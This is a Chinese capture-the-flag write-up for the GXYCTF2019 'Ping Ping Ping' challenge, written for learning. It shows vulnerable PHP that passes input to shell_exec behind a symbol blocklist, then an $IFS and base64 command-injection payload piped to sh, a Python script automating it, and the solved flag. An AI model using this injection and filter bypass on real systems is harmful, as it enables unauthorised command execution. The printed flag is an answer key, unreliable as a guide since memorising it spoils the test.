逗比学CTF.day8
[GXYCTF2019]Ping Ping Ping
从题目上看应该是代码执行漏洞
果然没猜错,get获取IP变量的值,然后执行,试一下:
直接执行成功,有点不可思议,我直接cat flag.php,真就这么简单?
意思是过滤了空格?
这是什么情况,过滤这么多?再换一个试试
WTF,放弃读flag,换个文件读读。
一定要点击查看源码,一定要记住。
<?php
if(isset($_GET['ip'])){$ip = $_GET['ip'];if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);die("fxck your symbol!");} else if(preg_match("/ /", $ip)){die("fxck your space!");} else if(preg_match("/bash/", $ip)){die("fxck your bash!");} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");}$a = shell_exec("ping -c 4 ".$ip);echo "<pre>";print_r($a);
}
?>
这样看清楚多了,符号快过滤全了,flag也过滤掉了,空格和bash也过滤了。那就用base64编码绕过。
payload=?ip=|echo$IFS$1Y2F0IGZsYWcucGhw|base64I$FS$1-d|sh
为了学习python,最后一步,拿python完成
import base64
import requests
import reurl = 'http://f38912c5-a3ff-4f53-8731-f8361d7d8930.node3.buuoj.cn/'
command = b'cat flag.php'
payload = 'ip=|echo$IFS$1%s|base64$IFS$1-d|sh' % base64.b64encode(command).decode('utf-8')res=requests.get(url='%s?%s'%(url,payload)).content
flag=re.search('flag{.*}',res.decode('utf-8'))
print(flag.group(0))
flag:
flag{5dc4d98a-b54e-47db-ae7e-8b648343aae4}
逗比学CTF.day8相关推荐
- 逗比学CTF.day2
BUU CODE REVIEW 1 本体包含html传参,弱类型比较,反序列化 首先是原题源码 <?php /*** Created by PhpStorm.* User: jinzhao* D ...
- 南邮tip sql.php_南京邮电大学 CTF Write Up
这次来看看某著名大学-- (Ps:因本人较懒,所以做题时都是手工+度娘,几乎没有用到浏览器以外的工具,如有更好的办法,欢迎留言告知~) Web 签到题 直接查看源代码吧.. key在哪里? nctf{ ...
- 逗比学树莓派之GPIO
wiringPi适合那些具有C语言基础,在接触树莓派之前已经接触过单片机或者嵌入式开发的人群.wiringPi的API函数和arduino很相似,这也使得它广受欢迎.作者给出了大量的说明 ...
- switchyomega插件_CTF|你所关注的CTFer都在用的插件合集【附:XXE补给+CTF训练集】...
不看后悔系列,建议收藏 相信大家对 CTF 都不陌生了,今天为大家带来了一系列 CTF 必备 Chrome 插件. CTF 可能很多人想学 CTF,但又怕零基础学不懂.其实,CTF 并没有那么难. C ...
- 写一下自已对ctf的了解,以便日后自已需要
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自 ...
- [CTF] CTF入门指南
CTF入门指南 何为CTF ? CTF(Capture The Flag)夺旗比赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式.CTF起源于1996年DEFCON全球黑客大会 ...
- otf和ctf的意义_《亲爱的,热爱的》带火网络安全圈的CTF 但为何圈内人吐槽?...
近日,正在热播的电视剧<亲爱的,热爱的>将小众名词CTF推向了社会大众. 有网友表示,正是因为看了电视剧,认真搜了什么是CTF,并且想认真学习它. 有网友表示想学CTF 还有网友表示,网络 ...
- IDF - CTF - 牛刀小试
发现一个学CTF的好地方,IDF实验室的CTF训练营(http://ctf.idf.cn/).. 刚接触CTF,来玩下牛刀小试,AK了..好爽好爽.. 1.摩斯密码 嘀嗒嘀嗒嘀嗒嘀嗒 时针它不停在转动 ...
- 【考证】大一规划、考证大军、水水水!
1.水一波学校成就 发一篇SCI 申请到master 申请到交换生 找到实习,简历 水满学分 GPA好看 当一回助教 当社团领导 进入校队acm github 100star 英语类证书(四六级) 从 ...
最新文章
- webpack入门之简单例子跑起来
- SQL重要知识点梳理!
- 通用窗口类 Inventory Pro 2.1.2 Demo1(下)
- 0x5f3759df的推导
- mysql 查看索引命中_请问下如何在Mysql中where与orderBy后在命中索引?
- 小程序助手多功能微信小程序反编译工具
- AS出现Error:Cause: peer not authenticated
- 软件测试经典案例佣金问题,佣金等价划分和测试用例设计.PPT
- Cisco Packet Tracer思科模拟器中路由器的TELNET配置
- 求素数 java 101 200_Java求101~200之间的素数
- 离散小波变换wavedec matlab,MATLAB小波变换指令及其功能介绍(超级有用)
- 先思索后动笔:论讨论与结论的区别
- Spring Security 小记 - @Secured(), @PreAuthorize() 及 @RolesAllowed()
- 物联网智能家居基本方法实现之经典
- 强制IE使用兼容模式
- MOCO: Momentum Contrast for Unsupervised Visual Representation Learning
- java中包地作用_什么是PCB设计中的包地
- ResNet论文翻译——中英文对照+标注总结
- Qt开发经验小技巧61-70
- 文本框 html 哪些属性,html常见标签和属性